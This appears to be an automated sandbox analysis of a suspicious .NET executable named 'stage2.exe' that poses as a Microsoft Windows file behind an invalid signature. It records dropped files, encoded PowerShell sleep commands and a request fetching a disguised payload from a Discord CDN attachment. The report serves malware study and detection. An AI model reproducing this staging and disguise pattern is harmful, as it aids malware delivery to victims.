                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.8.4.<./.P.i.d.>.......
                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER3611.tmp.xml
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4725
                                                      Entropy (8bit):4.437433265070294
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwSD8zsaJgtWI9jMXjSWSC8BQs8fm8M4JNfJF7EI+q8vjfBnLf2S9SNd:uITfoEMXjzSNORJzK1L2S9SNd
                                                      MD5:507EFECDC1ABF8B2E8511E0F7A40ABB0
                                                      SHA1:0E29D507CD2497027B125A0C9C2B13D06A084595
                                                      SHA-256:AC230930084B32AC3153DA023ACE28A1C3614C28E833BF3A3EB4D8F02C4E2482
                                                      SHA-512:44239E9BE6D2B9E6F33B989698A835DBCFB49F0765FAA03C99149A193C1FF6A85D0FD1147A31EBC26A97DFC3C9D6C919EA9ABD9D982C187DEC496DD32AE4B798
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1346136" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):5829
                                                      Entropy (8bit):4.8968676994158
                                                      Encrypted:false
                                                      SSDEEP:96:WCJ2Woe5o2k6Lm5emmXIGvgyg12jDs+un/iQLEYFjDaeWJ6KGcmXx9smyFRLcU6f:5xoe5oVsm5emd0gkjDt4iWN3yBGHh9s6
                                                      MD5:36DE9155D6C265A1DE62A448F3B5B66E
                                                      SHA1:02D21946CBDD01860A0DE38D7EEC6CDE3A964FC3
                                                      SHA-256:8BA38D55AA8F1E4F959E7223FDF653ABB9BE5B8B5DE9D116604E1ABB371C1C87
                                                      SHA-512:C734ADE161FB89472B1DF9B9F062F4A53E7010D3FF99EDC0BD564540A56BC35743625C50A00635C31D165A74DCDBB330FFB878C5919D7B267F6F33D2AAB328E7
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):16360
                                                      Entropy (8bit):5.56095611490378
                                                      Encrypted:false
                                                      SSDEEP:384:nt9/62zDkCGm9M3i6b+cBSBKnQultIK8tpRuFZU9NnaqYCy:+YGm+3J74KQultAnRo+ajV
                                                      MD5:251C0346B0D4B607AE0308E7A63905CC
                                                      SHA1:259BD3A23B07329B366836FEABFC5C375C2CFD98
                                                      SHA-256:ABD1AC4894EA5AC7AF272589E97472DFA394A8B3E0A92120732E551978952D42
                                                      SHA-512:45A9CCB3AD2146A584CBFE34BEFF38789D2811F12388F3078444CCEB52C203E47957906DB42311EA00CAC6E322DB5460B255F1E11EA1225254ADB8CCF1FE4BA1
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview: @...e...............................[.B.:.u..........@..........H...............<@.^.L."My...:'..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3hiw1gde.haw.ps1
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Reputation:high, very likely benign file
                                                      Preview: 1
                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dfyzxky1.kbr.psm1
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview: 1
                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kw2ltvwn.ds0.psm1
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview: 1
                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z0qgkhds.0yb.ps1
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview: 1
                                                      C:\Users\user\Documents\20220117\PowerShell_transcript.082561.7m2ZOLtQ.20220117022409.txt
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):975
                                                      Entropy (8bit):5.124059992328832
                                                      Encrypted:false
                                                      SSDEEP:24:BxSAexvBnGx2DOXUWj5i5WiHjeTKKjX4CIym1ZJXnBWnxSAZgS:BZavhGoOziqDYB1ZdB4ZZgS
                                                      MD5:BBD1DFD615841C5948E4F29E6C82F116
                                                      SHA1:DD38516AE01450D37B9C323A441FCAA51E9D948C
                                                      SHA-256:46C7D5E25E092B25F45D7832CCE18B4FDBE5F3B2F30FDB9E7F05172A6F1CE603
                                                      SHA-512:F727C3068F7F45758F571F1ED85C002EED9D1E49074F2277B1A0D25B18D68D270054762D108CEB3B5ABE264520B6A72E8AFB7AB401C999981EE3F0AD72466E49
                                                      Malicious:false
                                                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20220117022418..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 082561 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==..Process ID: 7160..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220117022419..**********************..PS>Start-Sleep -s 10..**********************..Command start time: 20220117022742..**********************..PS>$global:?..True..**********************..Windows PowerShell transcript end..End time: 20220117022742..**********************..
                                                      C:\Users\user\Documents\20220117\PowerShell_transcript.082561.vEnUoizJ.20220117022446.txt
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):975
                                                      Entropy (8bit):5.129269732116244
                                                      Encrypted:false
                                                      SSDEEP:24:BxSAixvBnGx2DOXUWj5i5WUHjeTKKjX4CIym1ZJX2nxSAZW:BZevhGoOzUqDYB1ZOZZW
                                                      MD5:B5EF0789C51BC25618A8B8380106F073
                                                      SHA1:C4B515F96607777B8ECCF44C84F014744D7C8AD3
                                                      SHA-256:6CF2DBD9945C70552992020AA9F6F0028209C8EAE18D1B080ABF9E75C5A25750
                                                      SHA-512:2D04D6AF284F7D97C3157A211B85A21AD8ACBF760D5A10C101A67212EE44204B3FFF9DBB37892258D50CB32B053CFDBE7635C76A93E2D65113509325A5F6136D
                                                      Malicious:false
                                                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20220117022458..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 082561 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==..Process ID: 7140..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220117022458..**********************..PS>Start-Sleep -s 10..**********************..Command start time: 20220117023016..**********************..PS>$global:?..True..**********************..Windows PowerShell transcript end..End time: 20220117023016..**********************..
                                                      C:\Windows\appcompat\Programs\Amcache.hve
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:MS Windows registry file, NT/2000 or above
                                                      Category:dropped
                                                      Size (bytes):1572864
                                                      Entropy (8bit):4.2717574458854735
                                                      Encrypted:false
                                                      SSDEEP:12288:7XBO1fBqU8EJBPgZy54wpZkRyo2Fqhn4agUVxYqolztxIQaLyHYaPeK:jBO1fBqU8EJBPgbE
                                                      MD5:374743508B8FDB08634F0B0FBB5571B8
                                                      SHA1:B86A1ED991E72FC4B4D930AB33BBA15CB1B0FB26
                                                      SHA-256:45420FB69A145CE87CB8B4B442D93AAF2A167AD97FF2C0B02A4FC7F6C5F1E1A8
                                                      SHA-512:016B1471EDF41C095AB092B75AC2C12FD86A1A16EC10929DB709B0276A01707FA3ABA4D5BA41784C5F49E41490EF1AAD312F3F506013F62F0FD163B06730630D
                                                      Malicious:false
                                                      C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:MS Windows registry file, NT/2000 or above
                                                      Category:dropped
                                                      Size (bytes):24576
                                                      Entropy (8bit):4.038364930198759
                                                      Encrypted:false
                                                      SSDEEP:384:FOl/5Rftx1GPJ4XZsFknM7ktPBqXWSeq5QMVyi6+/ml4Lk4KZd1DoXzkNKcmLzdE:olBRftx18J4XuFkM7KBqX9eq5QMVyi6e
                                                      MD5:1E6B5359110A436CD426A10C18A64BD9
                                                      SHA1:233D103FF0DF3EFD1788D1793E2DC82660BE1646
                                                      SHA-256:6EC713C240E5C0E01BEC5D131A8263237F04CB2D77EC465FC7914CA090BB8DEC
                                                      SHA-512:339ADC6FA78B9DD339F29002B4E53BDA4F70611231379A6BA638F92656B60F3DC1E6573D76DAF5A76177BD6EA3E451147A01A59707BEB75B1542CF4DA37AD933
                                                      Malicious:false

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):5.133399721297699
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                      • Win32 Executable (generic) a (10002005/4) 49.96%
                                                      • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      • DOS Executable Generic (2002/1) 0.01%
                                                      File name:stage2.exe
                                                      File size:214944
                                                      MD5:14c8482f302b5e81e3fa1b18a509289d
                                                      SHA1:16525cb2fd86dce842107eb1ba6174b23f188537
                                                      SHA256:dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
                                                      SHA512:fdaaac4ee73db90f69dc43a20f24d8f80a2f659288d28538c6fd1946b8861bb161b41ad3bcd65d16843cd21350e95c606f991a990110e100029b58abce978353
                                                      SSDEEP:3072:vf1GlJZUnjNbGgNQfYySIHiP1WLz4PcSOvG2jxZ:FbGoJ8iP19PjmGyf
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:E.a.................B...D......Na... ........@.. ....................................@................................

                                                      File Icon

                                                      Icon Hash:b270f086c6c2caf0

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x40614e
                                                      Entrypoint Section:.text
                                                      Digitally signed:true
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                      Time Stamp:0x61DC453A [Mon Jan 10 14:39:54 2022 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:v4.0.30319
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                      Authenticode Signature

                                                      Signature Valid:false
                                                      Signature Issuer:CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                      Signature Validation Error:The digital signature of the object did not verify
                                                      Error Number:-2146869232
                                                      Not Before, Not After
                                                      • 12/15/2020 1:29:14 PM 12/2/2021 1:29:14 PM
                                                      Subject Chain
                                                      • CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                      Version:3
                                                      Thumbprint MD5:1A1395EF5FC0A90A5B83AC4B531EEAC9
                                                      Thumbprint SHA-1:312860D2047EB81F8F58C29FF19ECDB4C634CF6A
                                                      Thumbprint SHA-256:416F4C0A00D1C4108488A04C2519325C5AA13BC80D0C017C45B00B911B8370A9
                                                      Serial:33000002ED2C45E4C145CF48440000000002ED

                                                      Entrypoint Preview

                                                      Instruction
                                                      jmp dword ptr [00402000h]
                                                      add byte ptr [eax], al

                                                      Data Directories

                                                       Name | Virtual Address | Virtual Size | Is in Section
                                                       IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
                                                       IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6100 | 0x4b | .text
                                                       IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x8000 | 0x24118 | .rsrc
                                                       IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
                                                       IMAGE_DIRECTORY_ENTRY_SECURITY | 0x28800 | 0xbfa0 | -
                                                       IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2e000 | 0xc | .reloc
                                                       IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
                                                       IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
                                                       IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
                                                       IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
                                                       IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
                                                       IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
                                                       IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                       IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
                                                       IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                       IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -

                                                      Sections

                                                       Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                       .text | 0x2000 | 0x4154 | 0x4200 | False | 0.578006628788 | data | 5.88284633145 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                       .rsrc | 0x8000 | 0x24118 | 0x24200 | False | 0.156378406142 | data | 3.54772483226 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                       .reloc | 0x2e000 | 0xc | 0x200 | False | 0.044921875 | data | 0.0815394123432 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                      Resources

                                                       Name | RVA | Size | Type | Language | Country
                                                       RT_ICON | 0x8250 | 0x1d4f | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | - | -
                                                       RT_ICON | 0x9fa0 | 0x10828 | dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0 | - | -
                                                       RT_ICON | 0x1a7c8 | 0x94a8 | data | - | -
                                                       RT_ICON | 0x23c70 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4043309055, next used block 4294967047 | - | -
                                                       RT_ICON | 0x27e98 | 0x25a8 | data | - | -
                                                       RT_ICON | 0x2a440 | 0x10a8 | data | - | -
                                                       RT_ICON | 0x2b4e8 | 0x468 | GLS_BINARY_LSB_FIRST | - | -
                                                       RT_GROUP_ICON | 0x2b950 | 0x68 | data | - | -
                                                       RT_VERSION | 0x2b9b8 | 0x3f4 | data | - | -
                                                       RT_MANIFEST | 0x2bdac | 0x36a | XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators | - | -

                                                      Imports

                                                       DLL | Import
                                                       mscoree.dll | _CorExeMain

                                                      Version Infos

                                                       Description | Data
                                                       Translation | 0x0000 0x04b0
                                                       LegalCopyright | . .
                                                       Assembly Version | 10.0.18362.1500
                                                       InternalName | Tbopbh.exe
                                                       FileVersion | 10.0.18362.1500
                                                       CompanyName | Microsoft Corporation
                                                       LegalTrademarks | -
                                                       Comments | -
                                                       ProductName | Microsoft Windows
                                                       ProductVersion | 10.0.18362.1500
                                                       FileDescription | -
                                                       OriginalFilename | Tbopbh.exe

                                                      Network Behavior

                                                      Network Port Distribution

                                                      TCP Packets

                                                       Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                       Jan 17, 2022 02:25:23.920696974 CET | 49752 | 443 | 192.168.2.3 | 162.159.130.233
                                                       Jan 17, 2022 02:25:23.920753956 CET | 443 | 49752 | 162.159.130.233 | 192.168.2.3
                                                       Jan 17, 2022 02:25:23.920846939 CET | 49752 | 443 | 192.168.2.3 | 162.159.130.233
                                                       Jan 17, 2022 02:25:23.977926016 CET | 49752 | 443 | 192.168.2.3 | 162.159.130.233
                                                       Jan 17, 2022 02:25:23.977962017 CET | 443 | 49752 | 162.159.130.233 | 192.168.2.3
                                                       Jan 17, 2022 02:25:24.031980991 CET | 443 | 49752 | 162.159.130.233 | 192.168.2.3
                                                       Jan 17, 2022 02:25:24.032147884 CET | 49752 | 443 | 192.168.2.3 | 162.159.130.233
                                                       Jan 17, 2022 02:25:24.036612034 CET | 49752 | 443 | 192.168.2.3 | 162.159.130.233
                                                       Jan 17, 2022 02:25:24.036638021 CET | 443 | 49752 | 162.159.130.233 | 192.168.2.3
                                                       Jan 17, 2022 02:25:24.036952019 CET | 443 | 49752 | 162.159.130.233 | 192.168.2.3
                                                       Jan 17, 2022 02:25:24.083822966 CET | 49752 | 443 | 192.168.2.3 | 162.159.130.233
                                                       Jan 17, 2022 02:25:24.284538031 CET | 49752 | 443 | 192.168.2.3 | 162.159.130.233
                                                       Jan 17, 2022 02:25:24.326009989 CET | 443 | 49752 | 162.159.130.233 | 192.168.2.3
                                                       Jan 17, 2022 02:25:24.443249941 CET | 443 | 49752 | 162.159.130.233 | 192.168.2.3
                                                       Jan 17, 2022 02:25:24.443366051 CET | 443 | 49752 | 162.159.130.233 | 192.168.2.3
                                                       Jan 17, 2022 02:25:24.443631887 CET | 49752 | 443 | 192.168.2.3 | 162.159.130.233
                                                       Jan 17, 2022 02:25:24.450921059 CET | 49752 | 443 | 192.168.2.3 | 162.159.130.233

                                                      UDP Packets

                                                       Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                       Jan 17, 2022 02:25:23.882636070 CET | 49572 | 53 | 192.168.2.3 | 8.8.8.8
                                                       Jan 17, 2022 02:25:23.905548096 CET | 53 | 49572 | 8.8.8.8 | 192.168.2.3

                                                      DNS Queries

                                                       Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                       Jan 17, 2022 02:25:23.882636070 CET | 192.168.2.3 | 8.8.8.8 | 0xa202 | Standard query (0) | cdn.discordapp.com | A (IP address) | IN (0x0001)

                                                      DNS Answers

                                                       Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                       Jan 17, 2022 02:25:23.905548096 CET | 8.8.8.8 | 192.168.2.3 | 0xa202 | No error (0) | cdn.discordapp.com | - | 162.159.130.233 | A (IP address) | IN (0x0001)
                                                       Jan 17, 2022 02:25:23.905548096 CET | 8.8.8.8 | 192.168.2.3 | 0xa202 | No error (0) | cdn.discordapp.com | - | 162.159.135.233 | A (IP address) | IN (0x0001)
                                                       Jan 17, 2022 02:25:23.905548096 CET | 8.8.8.8 | 192.168.2.3 | 0xa202 | No error (0) | cdn.discordapp.com | - | 162.159.134.233 | A (IP address) | IN (0x0001)
                                                       Jan 17, 2022 02:25:23.905548096 CET | 8.8.8.8 | 192.168.2.3 | 0xa202 | No error (0) | cdn.discordapp.com | - | 162.159.129.233 | A (IP address) | IN (0x0001)
                                                       Jan 17, 2022 02:25:23.905548096 CET | 8.8.8.8 | 192.168.2.3 | 0xa202 | No error (0) | cdn.discordapp.com | - | 162.159.133.233 | A (IP address) | IN (0x0001)

                                                      HTTP Request Dependency Graph

                                                      • cdn.discordapp.com

                                                      HTTPS Proxied Packets

                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                       0 | 192.168.2.3 | 49752 | 162.159.130.233 | 443 | C:\Users\user\Desktop\stage2.exe
                                                       Timestamp | kBytes transferred | Direction | Data
                                                       2022-01-17 01:25:24 UTC | 0 | OUT | GET /attachments/928503440139771947/930108637681184768/Tbopbh.jpg HTTP/1.1
                                                      Host: cdn.discordapp.com
                                                      Connection: Keep-Alive
                                                       2022-01-17 01:25:24 UTC | 0 | IN | HTTP/1.1 403 Forbidden
                                                      Date: Mon, 17 Jan 2022 01:25:24 GMT
                                                      Content-Type: application/xml; charset=UTF-8
                                                      Content-Length: 223
                                                      Connection: close
                                                      CF-Ray: 6cebca1adc534a68-FRA
                                                      Cache-Control: private, max-age=0
                                                      Expires: Mon, 17 Jan 2022 01:25:24 GMT
                                                      Vary: Accept-Encoding
                                                      CF-Cache-Status: MISS
                                                      Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                      X-GUploader-UploadID: ADPycds5oM3NpZ9AylXZpGVOB9ntKzX9oHiZ36JltKQWVbDwXaSj4icPcReICi5s5vNaRHT4QvI_mIj3uwpfm47zzoOikFzaRA
                                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RfbSACd0FpP8AarT40rUdyTU16oiVuL8ktNluhrU0TLjW%2BTGsBj6c0zZg%2FW2Tg%2BHLybyYjE0%2BAX8GvswXYherK%2BwZycY1622%2BqIiXLXq84wLdlCovP450WnSVpVht58ekJr99w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
